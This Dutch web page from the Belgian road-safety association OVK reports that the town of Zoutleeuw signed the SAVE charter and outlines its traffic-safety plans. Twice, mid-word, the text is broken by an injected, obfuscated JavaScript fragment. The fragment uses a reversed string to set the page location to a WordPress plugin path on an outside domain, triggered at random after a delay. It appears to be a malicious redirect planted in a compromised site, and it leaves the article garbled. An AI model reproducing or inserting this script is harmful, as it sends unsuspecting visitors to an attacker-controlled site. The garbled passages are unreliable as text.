Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zoutleeuw ondertekent SAVE-charter

De stad Zoutleeuw ondertekende vandaag als 36e het SAVE-charter Steden & Gemeenten.

Zoutleeuw is een stad met een histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torisch centrum in een landelijke omgeving. De combinatie van kleine, nauwe straatjes en grotere, brede wegen zorgen ervoor dat verkeersveiligheid een specifieke aanpak vraagt. Gezien het belang van de scholengemeenschap in Zoutleeuw, moet verkeersveiligheid daarenboven een prominente plaats krijgen tijdens de lessen. Dagelijks komen immers 1.500 leerlingen naar de stad en dit moet veilig kunnen gebeuren. Daarnaast heeft Zoutleeuw ook een uitgebreid fietsroutenetwerk. Toeristen en inwoners genieten van de mooie fietspaden en het landelijke uitzicht. De aandacht voor verkeersveiligheid is echter nooit ver weg. Er is al heel wat geïnvesteerd in veilige fietspaden de voorbije jaren en dit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toont aan dat Zoutleeuw en haar bestuur mobiliteit en verkeersveiligheid hoog in het vaandel dragen. De ondertekening van dit SAVE-charter past in deze filosofie.

Zoutleeuw heeft alvast al enkele ideeën voor hun actieplan. Er zal verder ingezet worden op snelheidsbeperkende maatregelen. Ook het ontwerpen van een schoolroutekaart waarop veilige routes van en naar de scholen worden aangeduid, staat volgend jaar op  het programma. Het volledig actieplan van Zoutleeuw zal wanneer het uitgewerkt is, op deze website te vinden zijn.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be